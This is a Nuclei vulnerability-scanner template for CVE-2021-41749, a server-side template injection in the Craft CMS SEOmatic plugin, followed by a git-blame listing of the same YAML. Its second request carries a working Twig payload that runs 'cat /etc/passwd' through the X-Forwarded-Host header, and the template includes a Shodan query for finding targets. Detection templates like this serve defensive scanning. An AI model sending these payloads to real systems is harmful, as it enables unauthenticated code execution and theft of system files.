nuclei-templates/http/cves/2021/CVE-2021-41749.yaml

id: CVE-2021-41749

info:
  name: CraftCMS SEOmatic - Server-Side Template Injection
  author: iamnoooob,ritikchaddha
  severity: critical
  description: |
    In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.
  reference:
    - https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41749
  classification:
    cve-id: CVE-2021-41749
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    max-request: 2
    verified: true
    shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"'
  tags: cve,cve2021,craftcms,cms,ssti

variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}
        Cache-Control: max-age=0

      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb
        Cache-Control: max-age=0

    skip-variables-check: true
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)'
          - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")'
          - 'status_code == 200'
        condition: and
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`id: CVE-2021-41749`

			`info:`
			`name: CraftCMS SEOmatic - Server-Side Template Injection`
Update CVE-2021-41749.yaml 2023-10-12 11:04:02 +00:00			`author: iamnoooob,ritikchaddha`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`severity: critical`
			`description: \|`
Update CVE-2021-41749.yaml 2023-10-12 11:04:02 +00:00			`In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`reference:`
			`- https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-41749`
			`classification:`
			`cve-id: CVE-2021-41749`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cwe-id: CWE-94`
			`metadata:`
			`max-request: 2`
			`verified: true`
			`shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"'`
			`tags: cve,cve2021,craftcms,cms,ssti`

			`variables:`
			`num1: "{{rand_int(40000, 44800)}}"`
			`num2: "{{rand_int(40000, 44800)}}"`
			`result: "{{to_number(num1)*to_number(num2)}}"`
			`marker: "{{randstr}}"`

			`http:`
			`- raw:`
			`- \|+`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}`
			`Cache-Control: max-age=0`

			`- \|+`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Forwarded-Host: xxx{{['cat /etc/passwd']\|filter('system')}}bbb`
			`Cache-Control: max-age=0`

Update CVE-2021-41749.yaml 2023-10-12 11:04:02 +00:00			`skip-variables-check: true`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`stop-at-first-match: true`
			`redirects: true`
			`max-redirects: 2`
			`matchers:`
update matcher 2023-10-13 08:28:39 +00:00			`- type: dsl`
			`dsl:`
			`- 'contains(body_1, "/{{marker}}{{result}}") \|\| regex("root:.*:0:0:", body_2)'`
			`- 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")'`
			`- 'status_code == 200'`
			`condition: and`